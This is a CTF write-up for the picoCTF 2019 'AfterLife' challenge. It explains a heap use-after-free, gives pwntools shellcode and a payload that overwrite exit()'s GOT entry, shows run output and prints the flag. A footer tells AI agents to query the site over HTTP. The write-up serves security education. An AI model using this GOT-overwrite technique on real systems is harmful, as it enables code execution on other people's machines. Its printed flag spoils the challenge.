# AfterLife

## Problem

> Just pwn this program and get a flag. It's also found in /problems/afterlife\_2\_049150f2f8b03c16dc0382de6e2e2215 on the shell server. Source.

* [Program](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/AfterLife/vuln/README.md)
* [Source](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/AfterLife/vuln.c)

## Solution

1. This problem is nearly identical to the "SecondLife" challenge. I recommend reading that write-up first since it covers the concepts needed to understand the following steps. Compared to "SecondLife," instead of freeing the first chunk twice, this program simply writes to the first chunk on lines 32 and 33 after it has been freed on line 29. This is known as a use-after-free exploit. The setup is exactly the same as the double-free exploit. The call to `malloc()` on line 34 replaces the GOT address of `exit()` with the address of the shellcode, and the call to `exit()` on line 35 invokes the shellcode.
2. Use-after-free vulnerability:

   ```cpp
    free(first); // <-- 'first' is freed
    free(third);
    fifth=malloc(128);
    puts("you will write on first after it was freed... an overflow will not be very useful...");
    gets(first); // <-- 'first' is used
   ```
3. We can use the same payload code as before:

   ```python
    shell_code = asm('jmp l1; nop;nop;nop;nop;nop;nop;nop;nop;nop;nop;nop;nop; l1: push {}; ret;'.format(hex(exe.symbols["win"])))
    payload = p32(exe.got["exit"] - 12) + p32(address + 8) + shell_code
   ```

   We add 8 bytes to address (which is the base address of the `first` buffer) since that's where we located our shellcode, right after `p32(exe.got["exit"] - 12) + p32(address + 8)`.
4. Note: Line 25 in this challenge is different than in "SecondLife". `fgets(first, LINE_BUFFER_SIZE, stdin);` was changed to `strncpy(first,argv[1],LINE_BUFFER_SIZE);`. So we need to specify and argument to the process when we launch it from the command line to get past line 25. Previously we just sent a single enter since `fgets` was used instead of `strncpy`.
5. Run the [script.py](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/AfterLife/script.py) `python script.py USER=<username> PASSWORD=<password>`:

   ```
    [*] '~/Documents/PicoCTF/Binary Exploitation/AfterLife/vuln'
        Arch:     i386-32-little
        RELRO:    Partial RELRO
        Stack:    Canary found
        NX:       NX disabled
        PIE:      No PIE (0x8048000)
        RWX:      Has RWX segments
    [+] Connecting to 2019shell1.picoctf.com on port 22: Done
    [*] <username>@2019shell1.picoctf.com:
        Distro    Ubuntu 18.04
        OS:       linux
        Arch:     amd64
        Version:  4.15.0
        ASLR:     Enabled
    [+] Opening new channel: 'pwd': Done
    [+] Receiving all data: Done (14B)
    [*] Closed SSH channel with 2019shell1.picoctf.com
    [*] Working directory: '/tmp/tmp.iglmDgay5w'
    [+] Opening new channel: 'ln -s /home/<username>/* .': Done
    [+] Receiving all data: Done (0B)
    [*] Closed SSH channel with 2019shell1.picoctf.com
    [*] win address: 0x8048966
    [*] exit address: 0x804d02c
    [+] Starting remote process b'/problems/afterlife_2_049150f2f8b03c16dc0382de6e2e2215/vuln' on 2019shell1.picoctf.com: pid 1695575
    [*] first address: 0x8836008
    [*] shellcode:
        00000000  eb 0c 90 90  90 90 90 90  90 90 90 90  90 90 68 66  │····│····│····│··hf│
        00000010  89 04 08 c3                                         │····│
        00000014
    [*] payload:
        00000000  20 d0 04 08  10 60 83 08  eb 0c 90 90  90 90 90 90  │ ···│·`··│····│····│
        00000010  90 90 90 90  90 90 68 66  89 04 08 c3               │····│··hf│····│
        0000001c
    [+] picoCTF{what5_Aft3r_187f3d9a}
   ```

### Flag

`picoCTF{what5_Aft3r_187f3d9a}`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://picoctf2019.haydenhousen.com/binary-exploitation/afterlife.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.